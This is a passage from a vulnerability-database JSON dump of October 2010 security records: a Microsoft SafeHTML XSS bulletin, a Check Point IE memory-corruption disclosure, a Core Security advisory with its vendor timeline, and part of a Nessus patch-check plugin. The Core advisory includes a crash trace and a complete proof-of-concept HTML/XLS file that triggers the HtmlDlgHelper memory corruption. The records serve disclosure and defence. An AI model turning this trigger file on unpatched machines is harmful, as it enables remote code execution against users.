(XSS) is a class of security vulnerability that can enable an attacker to inject script code into a user's session with a Web site. The vulnerability can affect Web servers that dynamically generate HTML pages. If these servers embed browser input in the dynamic pages that they send back to the browser, these servers can be manipulated to include maliciously supplied content in the dynamic pages. This can allow malicious script to be executed. Web browsers may perpetuate this problem through their assumptions of "trusted" sites and their use of cookies to maintain persistent state with the Web sites that they frequent. An XSS attack does not modify Web site content. Instead, it inserts new, malicious script that can execute at the browser in the context that is associated with a trusted server.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited the vulnerability could perform cross-site scripting attacks against users of a targeted site that uses SafeHTML to sanitize HTML. An attacker could then potentially run script on behalf of a victim user on the site.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nTo exploit this vulnerability, an attacker must have the ability to submit a specially crafted script to a target site using SafeHTML. Due to the vulnerability, in specific situations the specially crafted script is not properly sanitized, which subsequently could lead to an attacker-supplied script being run in the security context of a user who views the malicious content.\r\n\r\nFor cross-site scripting attacks, this vulnerability requires that a user be visiting a compromised site for any malicious action to occur. For instance, after an attacker has successfully submitted specially crafted script to the targeted site using SafeHTML, any Web page on that site that contains the specially crafted script is a potential vector for persistent cross-site scripting attacks. When a user visits a Web page that contains the specially crafted script, the script could be run in the security context of the user.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nSystems where users connect to a server that uses SafeHTML to sanitize HTML content, such as workstations or terminal servers, are primarily at risk.\r\n\r\nWhat does the update do? \r\nThe update addresses the vulnerability by modifying the way that SafeHTML sanitizes HTML content.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nYes. This vulnerability has been publicly disclosed. It has been assigned Common Vulnerability and Exposure number CVE-2010-3324.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022\t\r\n\r\nSirdarckcat of Google Inc. for reporting the HTML Sanitization Vulnerability (CVE-2010-3243)\r\n\u2022\t\r\n\r\nMario Heiderich for reporting the HTML Sanitization Vulnerability (CVE-2010-3324)\r\nTop of sectionTop of section\r\nMicrosoft Active Protections Program (MAPP)\r\n\r\nTo improve security protections for customers, Microsoft provides vulnerability information to major security software providers in advance of each monthly security update release. Security software providers can then use this vulnerability information to provide updated protections to customers via their security software or devices, such as antivirus, network-based intrusion detection systems, or host-based intrusion prevention systems. To determine whether active protections are available from security software providers, please visit the active protections Web sites provided by program partners, listed in Microsoft Active Protections Program (MAPP) Partners.\r\n\r\nSupport\r\n\u2022\t\r\n\r\nCustomers in the U.S. and Canada can receive technical support from Security Support or 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates. For more information about available support options, see Microsoft Help and Support.\r\n\u2022\t\r\n\r\nInternational customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022\t\r\n\r\nV1.0 (October 12, 2010): Bulletin published.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "securityvulns", "title": "Microsoft Security Bulletin MS10-072 - Important Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3324", "CVE-2010-3243"], "modified": "2010-10-13T00:00:00", "id": "SECURITYVULNS:DOC:24872", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24872", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": "Dear List,\r\n\r\nI'm writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.\r\n\r\n\r\nCheck Point Software Technologies - Vulnerability Discovery Team (VDT)\r\nhttp://www.checkpoint.com/defense/\r\n\r\nInternet Explorer Uninitialized Memory Corruption Vulnerability\r\nCVE-2010-3331 - MS10-071\r\n\r\nINTRODUCTION\r\n\r\nThere exists a vulnerability within the way internet explorer handles specific objects that has not been correctly initialized or\r\nhas been deleted, which leads to uninitialized memory reference and code execution.\r\n\r\nThis vulnerability can be triggered thru different vectors, been Microsoft Word one of the tested ones.\r\n\r\nThis problem was confirmed in the following versions of Internet Explorer and Windows, other versions \r\nmaybe also affected.\r\n\r\nInternet Explorer 6 running in All Versions of Windows\r\nInternet Explorer 7 running in All Versions of Windows\r\nInternet Explorer 8 running in All Versions of Windows\r\n\r\n\r\n\r\nMICROSOFT EXPLOTABILITY INDEX\r\n\r\nIn order to help the Microsoft Response Team we did further analysis on the vulnerability and we classify it as: 1 consistent exploit code likely.\r\n\r\nImportant to note again that since the faulty code also appears inside the mshtml.dll other applications may behave differently when triggering the problem (even\r\nmore when\r\ntalking about 3rd parties). \r\n\r\n\r\nCVSS Scoring System\r\n\r\nThe CVSS score is: 8.3\r\n Base Score: 10\r\n Temporal Score: 8.3\r\nWe used the following values to calculate the scores:\r\n Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:C\r\n Temporal score is: E:F/RL:OF/RC:C\r\n\r\n\r\n\r\nTRIGGERING THE PROBLEM\r\n\r\nThis vulnerability can be triggered by creating a persistent object with class id:\r\nCLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389.\r\n\r\nThe problem is triggered by the an exploit code available to interested party which causes invalid memory access in\r\nall the referred versions.\r\n\r\n\r\n\r\n\r\nCREDITS\r\n\r\nThis vulnerability was discovered and researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT).\r\n\r\n\r\n\r\n\r\nBest Regards,\r\n \r\nRodrigo.\r\n \r\n--\r\nRodrigo Rubira Branco\r\nSenior Security Researcher\r\nVulnerability Discovery Team (VDT)\r\nCheck Point Software Technologies", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "securityvulns", "title": "Internet Explorer Uninitialized Memory Corruption Vulnerability - CVE-2010-3331", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3331"], "modified": "2010-10-13T00:00:00", "id": "SECURITYVULNS:DOC:24886", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24886", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:37", "description": " Core Security Technologies - CoreLabs Advisory\r\n http://corelabs.coresecurity.com\r\n\r\n Microsoft Office HtmlDlgHelper class memory corruption\r\n\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Microsoft Office HtmlDlgHelper class memory corruption\r\nAdvisory Id: CORE-2010-0517\r\nAdvisory URL:\r\n[http://www.coresecurity.com/content/MS-Office-HtmlDlgHelper-memory-corruption]\r\nDate published: 2010-10-12\r\nDate of last update: 2010-10-14\r\nVendors contacted: Microsoft\r\nRelease mode: Coordinated release\r\n\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Missing Initialization [CWE-456]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2010-3329\r\nBugtraq ID: N/A\r\n\r\n\r\n3. *Vulnerability Description*\r\n\r\nMicrosoft Windows is prone to a memory corruption vulnerability when\r\ninstantiating the 'HtmlDlgHelper Class Object' in a Microsoft Office\r\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\r\nInternet Explorer ('mshtmled.dll'). This vulnerability could be used by\r\na remote attacker to execute arbitrary code with the privileges of the\r\nuser that opened the malicious file.\r\n\r\n\r\n4. *Vulnerable packages*\r\n\r\n . IE 6\r\n . IE 7\r\n . IE 8\r\n . MS Office XP\r\n . MS Office 2003\r\n . MS Office 2007 and MS Office 2010 (the control is disabled by default)\r\n\r\n\r\n5. *Non-vulnerable packages*\r\n\r\n . For further information and patches about this issue look at the\r\nMicrosoft Security Bulletin Summary for October 2010 [1], patch ms10-071.\r\n\r\n\r\n6. *Credits*\r\n\r\nThis vulnerability was discovered by Damian Frizza from Core Security\r\nTechnologies.\r\n\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\nMicrosoft Windows is prone to a memory corruption vulnerability when\r\ninstantiating the 'HtmlDlgHelper Class Object'\r\n('CLASSID:3050f4e1-98b5-11cf-bb82-00aa00bdce0b') in a Microsoft Office\r\nDocument (ie: .XLS, .DOC). The affected vulnerable module is part of\r\nInternet Explorer ('mshtmled.dll'). The vulnerability occurs in\r\n'mshtmled.dll' when the destructor of the 'CHtmlDlgHelper' class is\r\ncalled and then makes access to uninitialized memory.\r\n\r\nThe ActiveX control is marked as "Not Safe for Initialization", and\r\nprompts the user with: "ActiveX controls might contain viruses or other\r\nsecurity hazards. Do not enable this content unless you trust the source\r\nof this file". However, in Office 2003 the bug is triggered even if the\r\nuser answers "No" to the prompt.\r\n\r\nThe following code is where the vulnerability occurs, when opening a\r\n.XLS document on Microsoft Office Excel 2003 ('mshtmled.dll'\r\nv8.0.6001.18702):\r\n\r\n/-----\r\nmshtmled!ReleaseInterface:\r\n42b919c0 8bff mov edi,edi\r\n42b919c2 55 push ebp\r\n42b919c3 8bec mov ebp,esp\r\n42b919c5 8b4508 mov eax,dword ptr [ebp+8]\r\nss:0023:0013d104=00310065\r\n42b919c8 85c0 test eax,eax\r\n42b919ca 7406 je mshtmled!ReleaseInterface+0x12\r\n(42b919d2) [br=0]\r\n42b919cc 8b08 mov ecx,dword ptr [eax] ds:0023:00310065\r\n42b919ce 50 push eax\r\n42b919cf ff5108 call dword ptr [ecx+8] \r\nds:0023:7d02029c=2a2c277a\r\n\r\neax=00310065 ebx=00000000 ecx=7d020294 edx=df0b3d60 esi=001edbdc\r\nedi=00000000\r\neip=2a2c277a esp=0013d0f4 ebp=0013d0fc iopl=0 nv up ei pl nz na\r\npe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 \r\nefl=00000206\r\n\r\nStack Trace:\r\n<Unloaded_ion.dll>+0x2a2c2779\r\nmshtmled!ReleaseInterface+0x12\r\nmshtmled!CHtmlDlgHelper::~CHtmlDlgHelper+0x10\r\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::`scalar deleting\r\ndestructor'+0xd\r\nmshtmled!ATL::CComAggObject<CHtmlDlgHelper>::Release+0x27\r\nVBE6!rtcStrConvVar+0xbd65\r\nVBE6!rtcSetDatabaseLcid+0xa823\r\nEXCEL!Ordinal41+0xd2ad0\r\nEXCEL!Ordinal41+0x14082a\r\nUSER32!CallWindowProcW+0x1b\r\nInstruction Address: 0x000000002a2c277a\r\n-----/\r\n\r\n\r\nThe following html code demonstrates the bug on Excel 2002/2003. Save\r\nthe file as .XLS and open it on Excel.\r\n\r\n/-----\r\n<html xmlns:v="urn:schemas-microsoft-com:vml"\r\nxmlns:o="urn:schemas-microsoft-com:office:office"\r\nxmlns:x="urn:schemas-microsoft-com:office:excel">\r\n\r\n<head>\r\n<meta http-equiv=Content-Type content="text/html; charset=windows-1252">\r\n<meta name=ProgId content=Excel.Sheet>\r\n<meta name=Generator content="Microsoft Excel 10">\r\n<!--[if !mso]>\r\n<style>\r\nv\:* {behavior:url(#default#VML);}\r\no\:* {behavior:url(#default#VML);}\r\nx\:* {behavior:url(#default#VML);}\r\n.shape {behavior:url(#default#VML);}\r\n</style>\r\n<![endif]--><!--[if gte mso 9]><xml>\r\n <o:DocumentProperties>\r\n <o:LastAuthor>TEST</o:LastAuthor>\r\n <o:LastSaved>2010-08-03T05:19:51Z</o:LastSaved>\r\n <o:Version>10.6858</o:Version>\r\n </o:DocumentProperties>\r\n <o:OfficeDocumentSettings>\r\n <o:DownloadComponents/>\r\n </o:OfficeDocumentSettings>\r\n</xml><![endif]-->\r\n\r\n<!--[if gte mso 9]><xml>\r\n <x:ExcelWorkbook>\r\n <x:ExcelWorksheets>\r\n <x:ExcelWorksheet>\r\n <x:Name>test</x:Name>\r\n <x:WorksheetOptions>\r\n <x:CodeName>Sheet1</x:CodeName>\r\n <x:Selected/>\r\n <x:DoNotDisplayGridlines/>\r\n <x:ProtectContents>False</x:ProtectContents>\r\n <x:ProtectObjects>False</x:ProtectObjects>\r\n <x:ProtectScenarios>False</x:ProtectScenarios>\r\n </x:WorksheetOptions>\r\n </x:ExcelWorksheet>\r\n </x:ExcelWorksheets>\r\n <x:WindowHeight>9345</x:WindowHeight>\r\n <x:WindowWidth>13260</x:WindowWidth>\r\n <x:WindowTopX>240</x:WindowTopX>\r\n <x:WindowTopY>60</x:WindowTopY>\r\n <x:ProtectStructure>False</x:ProtectStructure>\r\n <x:ProtectWindows>False</x:ProtectWindows>\r\n </x:ExcelWorkbook>\r\n</xml><![endif]--><!--[if gte mso 9]><xml>\r\n <o:shapedefaults v:ext="edit" spidmax="1026"/>\r\n</xml><![endif]--><!--[if gte mso 9]><xml>\r\n <o:shapelayout v:ext="edit">\r\n <o:idmap v:ext="edit" data="1"/>\r\n </o:shapelayout></xml><![endif]-->\r\n</head>\r\n\r\n<body link=blue vlink=purple>\r\n\r\n<table x:str border=0 cellpadding=0 cellspacing=0 width=64\r\nstyle='border-collapse:\r\n collapse;table-layout:fixed;width:48pt'>\r\n <col width=64 style='width:48pt'>\r\n <tr height=17 style='height:12.75pt'>\r\n <td height=17 width=64 style='height:12.75pt;width:48pt' align=left\r\n valign=top><!--[if gte vml 1]><v:shapetype id="_x0000_t201"\r\ncoordsize="21600,21600"\r\n o:spt="201" path="m,l,21600r21600,l21600,xe">\r\n <v:stroke joinstyle="miter"/>\r\n <v:path shadowok="f" o:extrusionok="f" strokeok="f" fillok="f"\r\n o:connecttype="rect"/>\r\n <o:lock v:ext="edit" shapetype="t"/>\r\n </v:shapetype><v:shape id="_x0000_s1025" type="#_x0000_t201"\r\nstyle='position:absolute;\r\n margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'\r\n strokecolor="windowText [64]" o:insetmode="auto">\r\n <![if gte mso 9]><o:title=""/>\r\n <![endif]><x:ClientData ObjectType="Pict">\r\n <x:SizeWithCells/>\r\n <x:CF>Pict</x:CF>\r\n <x:AutoPict/>\r\n </x:ClientData>\r\n </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;\r\n position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;\r\n height:17px'><![endif]>\r\n\r\n<object classid="CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B"\r\nid=obj></object>\r\n\r\n<![if !vml]></span><![endif]><span\r\n style='mso-ignore:vglayout2'>\r\n <table cellpadding=0 cellspacing=0>\r\n <tr>\r\n <td height=17 width=64 style='height:12.75pt;width:48pt'></td>\r\n </tr>\r\n </table>\r\n </span></td>\r\n </tr>\r\n <![if supportMisalignedColumns]>\r\n <tr height=0 style='display:none'>\r\n <td width=64 style='width:48pt'></td>\r\n </tr>\r\n <![endif]>\r\n</table>\r\n</body>\r\n</html>\r\n\r\n-----/\r\n\r\n\r\nThis exploitable condition was reproduced in the following versions of\r\n'mshtmled.dll':\r\n\r\n . 'mshtmled.dll' v8.0.6001.18702\r\n . 'mshtmled.dll' v8.0.6001.18000\r\n . 'mshtmled.dll' v7.0.6000.17023\r\n . 'mshtmled.dll' v7.0.6000.17080\r\n\r\n\r\n8. *Report Timeline*\r\n\r\n. 2010-05-28:\r\nInitial notification to the vendor. Draft advisory and proof-of-concept\r\nfiles sent to MSRC. Publication date set for July 13, 2010.\r\n\r\n. 2010-06-11:\r\nCore requests from the vendor an update on the status of this case.\r\n\r\n. 2010-06-14:\r\nThe vendor responds that its engineers are still investigating this\r\nissue; and that they expect to have more information from the\r\ninvestigation and triage process within the next few days.\r\n\r\n. 2010-06-15:\r\nThe vendors informs that they have been determined that the ActiveX\r\ncontrol is marked as "Not Safe for Initialization"; and prompts the user\r\nwith a dialog that warns the user that they are going to be executing a\r\npotentially malicious code. In consequence, the vendor treats this case\r\nas the same scenario as a user that tries to enable and open an Office\r\ndocument with a Macro or VBA code contained within.\r\n\r\n. 2010-06-15:\r\nCore asks the vendor if the previous mail means that it does not intent\r\nto fix the bug or that it does not recognize it as a security issue. The\r\nreporter's viewpoint is that a dialog prompt is not a fix "per se" and\r\njust a defense in depth mechanism; and that he would prefer to see the\r\nbug fixed rather than relying on mitigations that prevent exploitation.\r\n\r\n. 2010-06-15:\r\nCore adds the following information: in Office 2003 even if the user\r\nanswers No to the ActiveX dialog, the application ends up crashing.\r\n\r\n. 2010-06-16:\r\nVendor responds that it is currently investigating the new information.\r\n\r\n. 2010-06-28:\r\nVendor informs that it has found that the vulnerable code actually\r\nexists and is owned by the IE team whom is currently investigating the\r\ncrash; and that this case is transferred over to them (and to a new case\r\nmanager as well).\r\n\r\n. 2010-07-02:\r\nVendor informs Core that the IE team has finished the investigation into\r\nthis issue and was able to reproduce the issue reported. During the\r\ninvestigation it was determined that this is an exploitable crash in\r\nInternet Explorer. Vendor will send Core the list of affected Internet\r\nExplorer versions when available.\r\n\r\n. 2010-07-02:\r\nCore acknowledges receipt of the update, and reminds that although the\r\nvulnerable code is owned by the IE team this also affects Office\r\n(including 2010). Core offers to postpone publication of its advisory\r\nfrom July 13th to August 10th on the basis of a firm commitment to a\r\nrelease date from the vendor's side. Core informs that it is evaluating\r\nthe possibility of using Office killbit recently introduced by MS10-036\r\nas a workaround, but that MS10-036 points to a knowledge base article\r\n[2] that is no longer available.\r\n\r\n. 2010-07-07:\r\nVendor acknowledges previous mail, and states that it will determine\r\nwith the product team how this fix could be included in the August\r\nrelease. Vendor requests an updated version of the advisory, and to\r\ninclude a vendor statement.\r\n\r\n. 2010-07-22:\r\nCore requests an update on the status of the vulnerability report; and\r\ninforms that publication of its advisory has been rescheduled to August\r\n10, 2010, despite the fact that Core did not receive any updates. Core\r\ninforms that the publication of this advisory is transferred to a new\r\ncase manager.\r\n\r\n. 2010-08-04:\r\nCore sends an updated version of the advisory and also asks if MSRC can\r\nprovide:\r\n 1. The list of affected software versions.\r\n 2. The CVE number assigned to this vulnerability (if it exists).\r\n 3. The steps to reproduce the vulnerability in IE [3].\r\n 4. The link to the knowledge base article about the newly introduced\r\nOffice killbit given that Core is investigating using that defense\r\nmechanism as a workaround but MS10-036 points to a knowledge base\r\narticle that is no longer available\r\n([http://support.microsoft.com/kb/983632]).\r\n\r\n Core also notifies this advisory is currently scheduled to be published\r\non August 10, 2010 but the publication can be reviewed if Microsoft\r\nresponds with a firm commitment to a release date of fixes, and\r\ntechnical information about the root cause of this vulnerability.\r\n\r\n. 2010-08-04:\r\nMSRC responds that the updated advisory draft was internally forwarded\r\nand they are working on collecting answers to the requested questions.\r\n\r\n. 2010-08-05:\r\nMSRC sends the answers to the asked questions:\r\n 1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8.\r\n 2. MSRC is unable to assign a CVE as it is too early. CVEs are\r\ntypically assigned closer to the scheduled release date and MSRC will\r\nreceive the block of CVEs from Mitre for the October release of the\r\nInternet Explorer security update.\r\n 3. MSRC notifies there is no attack vector in IE, and they cannot\r\nprovide steps to reproduce the vulnerability in IE.\r\n 4. The knowledge base article about the newly introduced Office\r\nkillbit was redirected to [http://support.microsoft.com/kb/2252664].\r\n\r\n. 2010-08-06:\r\nCore asks MSRC to clarify if the fix for this issue has been scheduled\r\nto be released in October.\r\n\r\n. 2010-08-06:\r\nMSRC confirms that the fix for this issue is scheduled for the October\r\nrelease of IE.\r\n\r\n. 2010-08-09:\r\nCore re-schedules the publication of the advisory for October 12 and\r\nnotifies that this date should be considered as final, if Microsoft does\r\nnot release fixes on that date, the advisory will be released as 'user\r\nrelease'.\r\n\r\n. 2010-08-09:\r\nMSRC confirms that the fix for this issue is scheduled for the October\r\nrelease of IE.\r\n\r\n. 2010-10-01:\r\nMSRC provides a status update about this issue and notifies that it is\r\nslated to be included in the October release of the IE Cumulative Update\r\nand SafeHTML update scheduled for October 12, 2010. MSRC also notifies\r\nthat the CVE assigned to this issue is CVE-2010-3329.\r\n\r\n. 2010-10-01:\r\nMSRC notifies that they have made a mistake and included an invalid\r\ndetail in the last status update. In particular, the issue does not\r\naffect the SafeHTML update scheduled for October but it will be shipping\r\nin the IE Cumulative Update scheduled for October.\r\n\r\n. 2010-10-01:\r\nCore acknowledges the MSRC's e-mail and notifies that although the\r\nproblem is located in IE-owned code, the problem also affects Office up\r\nto 2010. Core assumes this will be specified in the MSRC bulletin and\r\nasks for confirmation.\r\n\r\n. 2010-10-04:\r\nMSRC confirms that the description of the vulnerability calls out that\r\nthe vector to the vulnerability is through opening a word document.\r\n\r\n. 2010-10-12:\r\nAdvisory CORE-2010-0517 is published.\r\n\r\n\r\n9. *References*\r\n\r\n[1] Microsoft security bulletin summary for October 2010 -\r\n[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].\r\n[2] Office killbit [http://support.microsoft.com/kb/983632].\r\n[3] This bug was originally investigated in Microsoft Office by Core,\r\nbut MSRC determined [2010-07-02] that this bug is an exploitable crash\r\nin Internet Explorer.\r\n[4] MSRC was not able to reproduce this issue on IE6, however they\r\nnotifies the code has been determined to exist in this version and the\r\nfix will be scoped to address this platform as well.\r\n\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\n[http://corelabs.coresecurity.com/].\r\n\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\n[http://www.coresecurity.com].\r\n\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2010 Core Security\r\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\r\n\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].\r\n\r\n\r\n", "cvss3": {}, "published": "2010-10-16T00:00:00", "type": "securityvulns", "title": "CORE-2010-0517 - Microsoft Office HtmlDlgHelper class memory corruption", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2010-3329"], "modified": "2010-10-16T00:00:00", "id": "SECURITYVULNS:DOC:24934", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:24934", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-17T15:53:27", "description": "The remote host is missing IE Security Update 2360131.\n\nThe remote version of IE is affected by several vulnerabilities that may allow an attacker to execute arbitrary code on the remote host.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "nessus", "title": "MS10-071: Cumulative Security Update for Internet Explorer (2360131)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-0808", "CVE-2010-3243", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3326", "CVE-2010-3327", "CVE-2010-3328", "CVE-2010-3329", "CVE-2010-3330", "CVE-2010-3331"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-071.NASL", "href": "https://www.tenable.com/plugins/nessus/49948", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(49948);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2010-0808\",\n \"CVE-2010-3243\",\n \"CVE-2010-3324\",\n \"CVE-2010-3325\",\n \"CVE-2010-3326\",\n \"CVE-2010-3327\",\n \"CVE-2010-3328\",\n \"CVE-2010-3329\",\n \"CVE-2010-3330\",\n \"CVE-2010-3331\"\n );\n script_bugtraq_id(\n 42993,\n 42467,\n 43695,\n 43696,\n 43703,\n 43704,\n 43705,\n 43706,\n 43707,\n 43709\n );\n script_xref(name:\"MSFT\", value:\"MS10-071\");\n script_xref(name:\"MSKB\", value:\"2360131\");\n\n script_name(english:\"MS10-071: Cumulative Security Update for Internet Explorer (2360131)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through a web\nbrowser.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing IE Security Update 2360131.\n\nThe remote version of IE is affected by several vulnerabilities that\nmay allow an attacker to execute arbitrary code on the remote host.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-071\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-071';\nkbs = make_list(\"2360131\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"2360131\";\nif (\n # Windows 7 and Windows Server 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"8.0.7600.20795\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"8.0.7600.16671\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", file:\"Mshtml.dll\", version:\"8.0.6001.23067\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Mshtml.dll\", version:\"8.0.6001.18975\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22477\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", 